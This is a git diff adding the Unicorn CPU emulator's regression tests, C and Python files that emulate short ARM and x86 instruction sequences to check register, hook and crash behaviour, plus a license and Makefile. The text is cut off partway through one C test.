+1,69 @@ +#include +#include +#include + +#include + +#define X86_CODE32 "\x00" // add byte ptr ds:[eax],al +#define ADDRESS 0x1000000 + +static void VM_exec() +{ + uc_engine *uc; + uc_err err; + uint32_t tmp; + unsigned int r_eax; + + r_eax = 0x1000008; + + // Initialize emulator in X86-32bit mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if(err) + { + printf("Failed on uc_open() with error returned: %s\n", uc_strerror(err)); + return; + } + + err = uc_mem_map(uc, ADDRESS, (4 * 1024 * 1024), UC_PROT_ALL); + if(err != UC_ERR_OK) + { + printf("Failed to map memory %s\n", uc_strerror(err)); + return; + } + + // write machine code to be emulated to memory + err = uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1); + if(err != UC_ERR_OK) + { + printf("Failed to write emulation code to memory, quit!: %s(len %zu)\n", uc_strerror(err), sizeof(X86_CODE32) - 1); + return; + } + + // initialize machine registers + uc_reg_write(uc, UC_X86_REG_EAX, &r_eax); + + // emulate machine code in infinite time + err = uc_emu_start(uc, ADDRESS, ADDRESS + (sizeof(X86_CODE32) - 1), 0, 0); + if(err) + { + printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + + uc_close(uc); + return; + } + + if (!uc_mem_read(uc, ADDRESS+8, &tmp, sizeof(tmp))) + printf(">>> Read 4 bytes from [0x%08X] = 0x%08X\n", ADDRESS+8, tmp); //should contain the byte '8' + else + printf(">>> Failed to read 4 bytes from [0x%08X]\n", ADDRESS+8); + + uc_close(uc); + + puts("No crash. Yay!"); +} + +int main(int argc, char *argv[]) +{ + VM_exec(); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/LICENSE b/ai_anti_malware/unicorn/unicorn-master/tests/regress/LICENSE new file mode 100644 index 0000000..dd85900 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/LICENSE @@ -0,0 +1,30 @@ +This is the software license for Unicorn regression tests. The regression tests +are written by several Unicorn contributors (See CREDITS.TXT) and maintained by +Hoang-Vu Dang + +Copyright (c) 2015, Unicorn contributors +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +* Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. +* Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. +* Neither the name of the developer(s) nor the names of its + contributors may be used to endorse or promote products derived from this + software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE +ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE +LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +POSSIBILITY OF SUCH DAMAGE. diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/Makefile b/ai_anti_malware/unicorn/unicorn-master/tests/regress/Makefile new file mode 100644 index 0000000..49f0dfe --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/Makefile @@ -0,0 +1,23 @@ +CFLAGS += -Wall -Werror -I../../include +CFLAGS += -D__USE_MINGW_ANSI_STDIO=1 +LDLIBS += -L../../ -lm -lunicorn + +UNAME_S := $(shell uname -s) +LDLIBS += -pthread +ifeq ($(UNAME_S), Linux) +LDLIBS += -lrt +endif + +EXECUTE_VARS = LD_LIBRARY_PATH=../../cmocka/src:../../ DYLD_LIBRARY_PATH=../../ + +TESTS_SOURCE = $(wildcard *.c) +TESTS = $(TESTS_SOURCE:%.c=%) + +.PHONY: all clean test + +test: $(TESTS) + +all: $(TESTS) + +clean: + rm -f $(TESTS) diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm64_reg_rw_w0_w30.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm64_reg_rw_w0_w30.py new file mode 100644 index 0000000..fc34ea4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm64_reg_rw_w0_w30.py @@ -0,0 +1,30 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.arm64_const import * +from unicorn.x86_const import * + +import regress + +class Arm64RegReadWriteW0ThroughW30(regress.RegressTest): + """ + Testing the functionality to read/write 32-bit registers in AArch64 + See issue #716 + """ + + def runTest(self): + uc = Uc(UC_ARCH_ARM64, UC_MODE_ARM) + + uc.reg_write(UC_ARM64_REG_X0, 0x1234567890abcdef) + self.assertEquals(uc.reg_read(UC_ARM64_REG_X0), 0x1234567890abcdef) + self.assertEquals(uc.reg_read(UC_ARM64_REG_W0), 0x90abcdef) + + uc.reg_write(UC_ARM64_REG_X30, 0xa1b2c3d4e5f6a7b8) + self.assertEquals(uc.reg_read(UC_ARM64_REG_W30), 0xe5f6a7b8) + + uc.reg_write(UC_ARM64_REG_W30, 0xaabbccdd) + self.assertEquals(uc.reg_read(UC_ARM64_REG_X30), 0xa1b2c3d4aabbccdd) + self.assertEquals(uc.reg_read(UC_ARM64_REG_W30), 0xaabbccdd) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_apsr_access.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_apsr_access.py new file mode 100644 index 0000000..33c10fd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_apsr_access.py @@ -0,0 +1,30 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.arm_const import * + +import regress + +class APSRAccess(regress.RegressTest): + + def runTest(self): + code = ( + b'\x00\x00\xa0\xe1' + # 0: mov r0, r0 + b'\x08\x10\x9f\xe5' + # 4: ldr r1, [pc, #8] + b'\x01\xf0\x28\xe1' + # 8: 01 f0 28 e1 msr apsr_nzcvq, r1 + b'\x00\x00\xa0\xe1' + # c: mov r0, r0 + b'\x00\x00\xa0\xe1' + # 10: mov r0, r0 + b'\x00\x00\x00\xff') # 14: data for inst @4 + + uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) + uc.mem_map(0x1000, 0x1000) + uc.mem_write(0x1000, code) # bxeq lr; mov r0, r0 + + uc.reg_write(UC_ARM_REG_APSR, 0) + uc.emu_start(0x1000, 0x100c) + + self.assertEqual(uc.reg_read(UC_ARM_REG_APSR), 0xf8000000) + self.assertEqual(uc.reg_read(UC_ARM_REG_APSR_NZCV), 0xf0000000) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_bx_unmapped.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_bx_unmapped.py new file mode 100644 index 0000000..e18d345 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_bx_unmapped.py @@ -0,0 +1,93 @@ +from __future__ import print_function +from unicorn import * +from unicorn.arm_const import * +import regress + +# code to be emulated +''' +ins = { + 0x00008cd4: """ + push {r11} + add r11, sp, #0 + mov r3, pc + mov r0, r3 + sub sp, r11, #0 + pop {r11} + bx lr + """, + 0x00008cf0: """ + push {r11} + add r11, sp, #0 + push {r6} + add r6, pc, $1 + bx r6 + .code 16 + mov r3, pc + add r3, $0x4 + push {r3} + pop {pc} + .code 32 + pop {r6} + mov r0, r3 + sub sp, r11, #0 + pop {r11} + bx lr + """, + 0x00008d20: """ + push {r11} + add r11, sp, #0 + mov r3, lr + mov r0, r3 + sub sp, r11, #0 + pop {r11} + bx lr + """, + 0x00008d68: "bl 0x8cd4\n" + "mov r4, r0\n" + "bl 0x8cf0\n" + "mov r3, r0\n" + "add r4, r4, r3\n" + "bl 0x8d20\n" + "mov r3, r0\n" + "add r2, r4, r3", +} +''' + +class BxTwiceTest(regress.RegressTest): + def runTest(self): + ADDRESS = 0x8000 + MAIN_ADDRESS = 0x8d68 + STACK_ADDR = ADDRESS + 0x1000 + + code = { + 0x8cf0: '\x04\xb0-\xe5\x00\xb0\x8d\xe2\x04`-\xe5\x01`\x8f\xe2\x16\xff/\xe1{F\x03\xf1\x04\x03\x08\xb4\x00\xbd\x00\x00\x04`\x9d\xe4\x03\x00\xa0\xe1\x00\xd0K\xe2\x04\xb0\x9d\xe4\x1e\xff/\xe1', + 0x8d20: '\x04\xb0-\xe5\x00\xb0\x8d\xe2\x0e0\xa0\xe1\x03\x00\xa0\xe1\x00\xd0K\xe2\x04\xb0\x9d\xe4\x1e\xff/\xe1', + 0x8cd4: '\x04\xb0-\xe5\x00\xb0\x8d\xe2\x0f0\xa0\xe1\x03\x00\xa0\xe1\x00\xd0K\xe2\x04\xb0\x9d\xe4\x1e\xff/\xe1', + 0x8d68: '\xd9\xff\xff\xeb\x00@\xa0\xe1\xde\xff\xff\xeb\x000\xa0\xe1\x03@\x84\xe0\xe7\xff\xff\xeb\x000\xa0\xe1\x03 \x84\xe0' + } + + try: + mu = Uc(UC_ARCH_ARM, UC_MODE_ARM) + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + for addr, c in code.items(): + print("Writing chunk to 0x{:x}".format(addr)) + mu.mem_write(addr, c) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_SP, STACK_ADDR) + + print("Starting emulation") + + # emulate code in infinite time & unlimited instructions + mu.emu_start(MAIN_ADDRESS, MAIN_ADDRESS + len(code[MAIN_ADDRESS])) + + print("Emulation done") + + r2 = mu.reg_read(UC_ARM_REG_R2) + print(">>> r2: 0x{:08x}".format(r2)) + + except UcError as e: + self.fail("ERROR: %s" % e) diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_bxeq_hang.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_bxeq_hang.py new file mode 100644 index 0000000..5040d72 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_bxeq_hang.py @@ -0,0 +1,28 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.arm_const import * + +import regress + +class BxHang(regress.RegressTest): + + def runTest(self): + uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) + uc.mem_map(0x1000, 0x1000) + uc.mem_write(0x1000, '1eff2f010000a0e1'.decode('hex')) # bxeq lr; mov r0, r0 + uc.count = 0 + + def hook_block(uc, addr, *args): + print 'enter block 0x%04x' % addr + uc.count += 1 + + uc.reg_write(UC_ARM_REG_LR, 0x1004) + uc.hook_add(UC_HOOK_BLOCK, hook_block) + print 'block should only run once' + uc.emu_start(0x1000, 0x1004) + + self.assertEqual(uc.count, 1) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_enable_vfp.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_enable_vfp.c new file mode 100644 index 0000000..aebcd98 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_enable_vfp.c @@ -0,0 +1,65 @@ +#include +#include +#include +#include + +#define ADDRESS 0x1000 +#define ARM_VMOV "\xC0\xEF\x10\x00" // VMOV.I32 D16, #0 ; Vector Move + +int main() +{ + uc_engine *uc; + uc_err err; + + err = uc_open(UC_ARCH_ARM, UC_MODE_ARM, &uc); + if (err) { + printf("uc_open %d\n", err); + return 1; + } + + uint64_t tmp_val; + + err = uc_reg_read(uc, UC_ARM_REG_C1_C0_2, &tmp_val); + if (err) { + printf("uc_open %d\n", err); + return 1; + } + + tmp_val = tmp_val | (0xf << 20); + err = uc_reg_write(uc, UC_ARM_REG_C1_C0_2, &tmp_val); + if (err) { + printf("uc_open %d\n", err); + return 1; + } + + size_t enable_vfp = 0x40000000; + err = uc_reg_write(uc, UC_ARM_REG_FPEXC, &enable_vfp); + if (err) { + printf("uc_open %d\n", err); + return 1; + } + + err = uc_mem_map(uc, ADDRESS, 4 * 1024, UC_PROT_ALL); + if (err) { + printf("uc_mem_map %d\n", err); + return 1; + } + + err = uc_mem_write(uc, ADDRESS, ARM_VMOV, sizeof(ARM_VMOV) - 1); + if (err) { + printf("uc_mem_map %s\n", uc_strerror(err)); + return 1; + } + + err = uc_emu_start(uc, ADDRESS, 0, 0, 1); + if (err) { + printf("uc_emu_start: %s\n", uc_strerror(err)); + return 1; + } + + printf("Success\n"); + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_fp_vfp_disabled.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_fp_vfp_disabled.py new file mode 100644 index 0000000..b8003a3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_fp_vfp_disabled.py @@ -0,0 +1,44 @@ +#!/usr/bin/python +# coding=utf8 + +# Added by Peter Mackay, relating to issue 571 +# "ARM NEON/VFP support seems to exist but is disabled by default" +# https://github.com/unicorn-engine/unicorn/issues/571 + +from unicorn import * +from unicorn.arm_const import * + +import regress + +class FpVfpDisabled(regress.RegressTest): + + def runTest(self): + # MRC p15, #0, r1, c1, c0, #2 + # ORR r1, r1, #(0xf << 20) + # MCR p15, #0, r1, c1, c0, #2 + # MOV r1, #0 + # MCR p15, #0, r1, c7, c5, #4 + # MOV r0,#0x40000000 + # FMXR FPEXC, r0 + code = '11EE501F' + code += '41F47001' + code += '01EE501F' + code += '4FF00001' + code += '07EE951F' + code += '4FF08040' + code += 'E8EE100A' + # vpush {d8} + code += '2ded028b' + + address = 0x1000 + mem_size = 0x1000 + code_bytes = code.decode('hex') + + uc = Uc(UC_ARCH_ARM, UC_MODE_THUMB) + uc.mem_map(address, mem_size) + uc.mem_write(address, code_bytes) + uc.reg_write(UC_ARM_REG_SP, address + mem_size) + uc.emu_start(address + 1, address + len(code_bytes)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_init_input_crash.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_init_input_crash.py new file mode 100644 index 0000000..ecafbfd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_init_input_crash.py @@ -0,0 +1,109 @@ +#!/usr/bin/env python +# Sample code for ARM of Unicorn. Nguyen Anh Quynh +# Python sample ported by Loi Anh Tuan +# + + +from __future__ import print_function +from unicorn import * +from unicorn.arm_const import * + + +# code to be emulated +ARM_CODE = "\x37\x00\xa0\xe3\x03\x10\x42\xe0" # mov r0, #0x37; sub r1, r2, r3 +THUMB_CODE = "\x83\xb0" # sub sp, #0xc +# memory address where emulation starts +ADDRESS = 0xF0000000 + + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = %u" %(address, size)) + + +# Test ARM +def test_arm(): + print("Emulate ARM code") + try: + # Initialize emulator in ARM mode + mu = Uc(UC_ARCH_ARM, UC_MODE_ARM) + + mem_size = 2 * (1024 * 1024) + mu.mem_map(ADDRESS, mem_size) + + stack_address = ADDRESS + mem_size + stack_size = stack_address # >>> here huge memory size + mu.mem_map(stack_address, stack_size) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, ARM_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_R0, 0x1234) + mu.reg_write(UC_ARM_REG_R2, 0x6789) + mu.reg_write(UC_ARM_REG_R3, 0x3333) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(ARM_CODE)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + r0 = mu.reg_read(UC_ARM_REG_R0) + r1 = mu.reg_read(UC_ARM_REG_R1) + print(">>> R0 = 0x%x" %r0) + print(">>> R1 = 0x%x" %r1) + + except UcError as e: + print("ERROR: %s" % e) + + +def test_thumb(): + print("Emulate THUMB code") + try: + # Initialize emulator in thumb mode + mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) + + # map 2MB memory for this emulation + mu.mem_map(ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(ADDRESS, THUMB_CODE) + + # initialize machine registers + mu.reg_write(UC_ARM_REG_SP, 0x1234) + + # tracing all basic blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code) + + # emulate machine code in infinite time + mu.emu_start(ADDRESS, ADDRESS + len(THUMB_CODE)) + + # now print out some registers + print(">>> Emulation done. Below is the CPU context") + + sp = mu.reg_read(UC_ARM_REG_SP) + print(">>> SP = 0x%x" %sp) + + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + test_arm() + print("=" * 20) + test_thumb() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_movr12_hang.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_movr12_hang.py new file mode 100644 index 0000000..1bb276e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_movr12_hang.py @@ -0,0 +1,32 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.arm_const import * + +import regress + +class MovHang(regress.RegressTest): + + def runTest(self): + uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) + uc.mem_map(0x1000, 0x1000) + uc.mem_write(0x1000, '00c000e3'.decode('hex')) # movw r12, #0 + + def hook_block(uc, addr, *args): + print 'enter block 0x%04x' % addr + uc.count += 1 + + uc.reg_write(UC_ARM_REG_R12, 0x123) + self.assertEquals(uc.reg_read(UC_ARM_REG_R12), 0x123) + + uc.hook_add(UC_HOOK_BLOCK, hook_block) + uc.count = 0 + + #print 'block should only run once' + uc.emu_start(0x1000, 0x1004, timeout=500) + + self.assertEquals(uc.reg_read(UC_ARM_REG_R12), 0x0) + self.assertEquals(uc.count, 1) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_vldr_invalid.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_vldr_invalid.py new file mode 100644 index 0000000..febf93e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/arm_vldr_invalid.py @@ -0,0 +1,18 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.arm_const import * + +import regress + +class VldrPcInsn(regress.RegressTest): + + def runTest(self): + uc = Uc(UC_ARCH_ARM, UC_MODE_ARM) + uc.mem_map(0x1000, 0x1000) + uc.mem_write(0x1000, 'ed9f8a3d'.decode('hex')) # vldr s16, [pc, #244] + # this will raise invalid insn + uc.emu_start(0x1000, 0x1004) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/bad_ram.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/bad_ram.py new file mode 100644 index 0000000..a74fa49 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/bad_ram.py @@ -0,0 +1,30 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.x86_const import * + +import regress + + +class Hang(regress.RegressTest): + + def runTest(self): + PAGE_SIZE = 0x5000 + CODE_ADDR = 0x400000 + RSP_ADDR = 0x200000 + binary1 = "\xCA\x24\x5D" # retf 0x5d24 + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + mu.mem_map(CODE_ADDR, PAGE_SIZE) + mu.mem_map(RSP_ADDR, PAGE_SIZE) + + mu.mem_write(CODE_ADDR, binary1) + mu.reg_write(UC_X86_REG_RSP, RSP_ADDR) + try: + self.assertEqual(mu.emu_start(CODE_ADDR, CODE_ADDR + PAGE_SIZE, 0), UC_ERR_FETCH_INVALID) + except UcError as e: + print("ERROR: %s" % e) + + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/block_test.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/block_test.c new file mode 100644 index 0000000..5af825f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/block_test.c @@ -0,0 +1,82 @@ +#include +#include +#include + +#include + +static int count = 1; + +// Callback function for tracing code (UC_HOOK_CODE & UC_HOOK_BLOCK) +// @address: address where the code is being executed +// @size: size of machine instruction being executed +// @user_data: user data passed to tracing APIs. +void cb_hookblock(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + fprintf(stderr, "# >>> Tracing basic block at 0x%"PRIx64", block size = 0x%x\n", address, size); + if (address != 0x1000000 && address != 0x1000200) { + fprintf(stderr, "not ok %d - address != 0x1000000 && address != 0x1000200\n", count++); + _exit(1); + } + fprintf(stderr, "ok %d - address (0x%x) is start of basic block\n", count++, (uint32_t)address); + if (size != 0x200) { + fprintf(stderr, "not ok %d - basic block size != 0x200\n", count++); + _exit(1); + } + fprintf(stderr, "ok %d - basic block size is correct\n", count++); +} + +int main() { + uc_engine *uc; + + fprintf(stderr, "# basic block callback test\n"); + fprintf(stderr, "# there are only two basic blocks 0x1000000-0x10001ff and 0x1000200-0x10003ff\n"); + + uc_err err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_open\n", count++); + + err = uc_mem_map(uc, 0x1000000, 4096, UC_PROT_ALL); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_mem_map\n", count++); + + uint8_t code[1024]; + //build a program that consists of 1019 nops followed by a jump -512 + //this program contains exactly 2 basic blocks, a block of 512 nops, followed + //by a loop body containing 507 nops and jump to the top of the loop + //the first basic block begins at address 0x1000000, and the second + //basic block begins at address 0x1000200 + memset(code, 0x90, sizeof(code)); + memcpy(code + 1024 - 5, "\xe9\x00\xfe\xff\xff", 5); + + err = uc_mem_write(uc, 0x1000000, code, sizeof(code)); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_mem_write\n", count++); + + uc_hook h1; + + err = uc_hook_add(uc, &h1, UC_HOOK_BLOCK, cb_hookblock, NULL, 1, 0); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_hook_add\n", count++); + + err = uc_emu_start(uc, 0x1000000, 0x1000000 + sizeof(code), 0, 1030); + if (err != UC_ERR_OK) { + fprintf(stderr, "not ok %d - %s\n", count++, uc_strerror(err)); + exit(0); + } + fprintf(stderr, "ok %d - uc_emu_start\n", count++); + + fprintf(stderr, "ok %d - Done", count++); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/callback-pc.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/callback-pc.py new file mode 100644 index 0000000..77f4e5a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/callback-pc.py @@ -0,0 +1,90 @@ +#!/usr/bin/env python + +# reg_write() can't modify PC from within trace callbacks +# issue #210 + +from __future__ import print_function +from unicorn import * +from unicorn.arm_const import * + +import regress + +BASE_ADDRESS = 0x10000000 + +# sub sp, #0xc +THUMB_CODE = "\x83\xb0" * 5 + +# callback for tracing instructions +def hook_code(uc, address, size, user_data): + print(">>> Tracing instruction at 0x%x, instruction size = %u" % (address, size)) + mu = user_data + print(">>> Setting PC to 0xffffffff") + mu.reg_write(UC_ARM_REG_PC, 0xffffffff) + +# callback for tracing basic blocks +def hook_block(uc, address, size, user_data): + print(">>> Tracing basic block at 0x%x, block size = 0x%x" %(address, size)) + mu = user_data + print(">>> Setting PC to 0xffffffff") + mu.reg_write(UC_ARM_REG_PC, 0xffffffff) + +class CallBackPCTest(regress.RegressTest): + + def test_instruction_trace(self): + try: + # initialize emulator in ARM's Thumb mode + mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) + + # map some memory + mu.mem_map(BASE_ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(BASE_ADDRESS, THUMB_CODE) + + # setup stack + mu.reg_write(UC_ARM_REG_SP, BASE_ADDRESS + 2 * 1024 * 1024) + + # tracing all instructions with customized callback + mu.hook_add(UC_HOOK_CODE, hook_code, user_data=mu) + + # emulate one instruction + mu.emu_start(BASE_ADDRESS, BASE_ADDRESS + len(THUMB_CODE), count=1) + + # the instruction trace callback set PC to 0xffffffff, so at this + # point, the PC value should be 0xffffffff. + pc = mu.reg_read(UC_ARM_REG_PC) + self.assertEqual(pc, 0xffffffff, "PC not set to 0xffffffff by instruction trace callback") + + except UcError as e: + self.assertFalse(0, "ERROR: %s" % e) + + def test_block_trace(self): + try: + # initialize emulator in ARM's Thumb mode + mu = Uc(UC_ARCH_ARM, UC_MODE_THUMB) + + # map some memory + mu.mem_map(BASE_ADDRESS, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(BASE_ADDRESS, THUMB_CODE) + + # setup stack + mu.reg_write(UC_ARM_REG_SP, BASE_ADDRESS + 2 * 1024 * 1024) + + # trace blocks with customized callback + mu.hook_add(UC_HOOK_BLOCK, hook_block, user_data=mu) + + # emulate one instruction + mu.emu_start(BASE_ADDRESS, BASE_ADDRESS + len(THUMB_CODE), count=1) + + # the block callback set PC to 0xffffffff, so at this point, the PC + # value should be 0xffffffff. + pc = mu.reg_read(UC_ARM_REG_PC) + self.assertEqual(pc, 0xffffffff, "PC not set to 0xffffffff by block callback") + + except UcError as e: + self.assertFalse(0, "ERROR: %s" % e) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/crash_tb.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/crash_tb.py new file mode 100644 index 0000000..9ecf61c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/crash_tb.py @@ -0,0 +1,37 @@ +#!/usr/bin/python + +from unicorn import * +from unicorn.x86_const import * + +import regress + +CODE_ADDR = 0x0 +binary1 = b'\xb8\x02\x00\x00\x00' +binary2 = b'\xb8\x01\x00\x00\x00' + +class CrashTB(regress.RegressTest): + + def runTest(self): + mu = Uc(UC_ARCH_X86, UC_MODE_64) + + mu.mem_map(CODE_ADDR, 2 * 1024 * 1024) + + # write machine code to be emulated to memory + mu.mem_write(CODE_ADDR, binary1) + + # emu for maximum 1 sec. + mu.emu_start(CODE_ADDR, len(binary1), UC_SECOND_SCALE) + + self.assertEqual(0x2, mu.reg_read(UC_X86_REG_RAX)) + + # write machine code to be emulated to memory + mu.mem_write(CODE_ADDR, binary2) + + # emu for maximum 1 sec. + mu.emu_start(CODE_ADDR, len(binary2), UC_SECOND_SCALE) + + self.assertEqual(0x1, mu.reg_read(UC_X86_REG_RAX)) + +if __name__ == '__main__': + regress.main() + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/deadlock_1.py b/ai_anti_malware/unicorn/unicorn-master/tests/regress/deadlock_1.py new file mode 100644 index 0000000..269a573 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/deadlock_1.py @@ -0,0 +1,20 @@ +#!/usr/bin/python +# From issue #1 of Ryan Hileman + +from unicorn import * +import regress + +CODE = b"\x90\x91\x92" + +class DeadLock(regress.RegressTest): + + def runTest(self): + mu = Uc(UC_ARCH_X86, UC_MODE_64) + mu.mem_map(0x100000, 4 * 1024) + mu.mem_write(0x100000, CODE) + + with self.assertRaises(UcError): + mu.emu_start(0x100000, 0x1000 + len(CODE)) + +if __name__ == '__main__': + regress.main() diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/eflags_noset.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/eflags_noset.c new file mode 100644 index 0000000..7f1b971 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/eflags_noset.c @@ -0,0 +1,126 @@ +#include +#include +#include + +#include + +#define X86_CODE32 "\x9C\x68\xFF\xFE\xFF\xFF\x9D\x9C\x58\x9D" // pushf; push ffffffeff; popf; pushf; pop eax; popf +#define ADDRESS 0x1000000 +#define PAGE_8K (1 << 13) +#define PAGE_4K (1 << 12) +#define TARGET_PAGE_MASK ~(PAGE_4K - 1) +#define TARGET_PAGE_PREPARE(addr) (((addr) + PAGE_4K - 1) & TARGET_PAGE_MASK) +#define TARGET_PAGE_ALIGN(addr) (addr - (TARGET_PAGE_PREPARE(addr) - addr) & TARGET_PAGE_MASK) + +#if defined(__i386__) +typedef uint32_t puint; +#define PRIX3264 PRIX32 +#else +typedef uint64_t puint; +#define PRIX3264 PRIX64 +#endif + +uint32_t realEflags() +{ + puint val = 0; + +#if defined(__i386__) + puint i = 0xFFFFFEFF; //attempt to set ALL bits except trap flag. + + __asm__("pushf\n\t" + "push %0\n\t" + "popf\n\t" + "pushf\n\t" + "pop %0\n\t" + "popf" + : "=r"(val) + : "r"(i) + : 